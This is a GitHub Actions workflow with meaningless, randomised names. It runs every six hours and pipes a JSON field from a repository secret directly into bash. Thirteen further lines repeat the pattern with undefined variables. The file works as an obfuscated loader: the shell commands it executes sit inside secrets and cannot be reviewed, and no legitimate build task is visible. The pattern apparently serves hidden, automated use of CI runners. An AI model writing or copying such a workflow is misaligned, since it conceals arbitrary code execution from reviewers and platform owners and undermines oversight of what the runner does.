name: liubanqi2314
on:
  workflow_dispatch:
  schedule:
    - cron: '53 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: liubanqi2314
        env:
          aryyq85: ${{ secrets.aryyq85 }}
        run: |
          echo $aryyq85 | jq -r .thme8068 | /bin/bash
          echo $nbo115 | jq -r .lkfnr42247 | /bin/bash
          echo $r50 | jq -r .r85 | /bin/bash
          echo $iny13442 | jq -r .ixhdb6 | /bin/bash
          echo $oud4032 | jq -r .tcoe51079 | /bin/bash
          echo $q21694 | jq -r .kmypx9 | /bin/bash
          echo $s25 | jq -r .ahb2080 | /bin/bash
          echo $dktqk37789 | jq -r .ccomj07354 | /bin/bash
          echo $fzw6769 | jq -r .yimb17228 | /bin/bash
          echo $gapsb95703 | jq -r .p6 | /bin/bash
          echo $njj5 | jq -r .alak7145 | /bin/bash
          echo $y671 | jq -r .nb08 | /bin/bash
          echo $r2 | jq -r .alldh130 | /bin/bash
          echo $qfs47847 | jq -r .dnrpk35 | /bin/bash

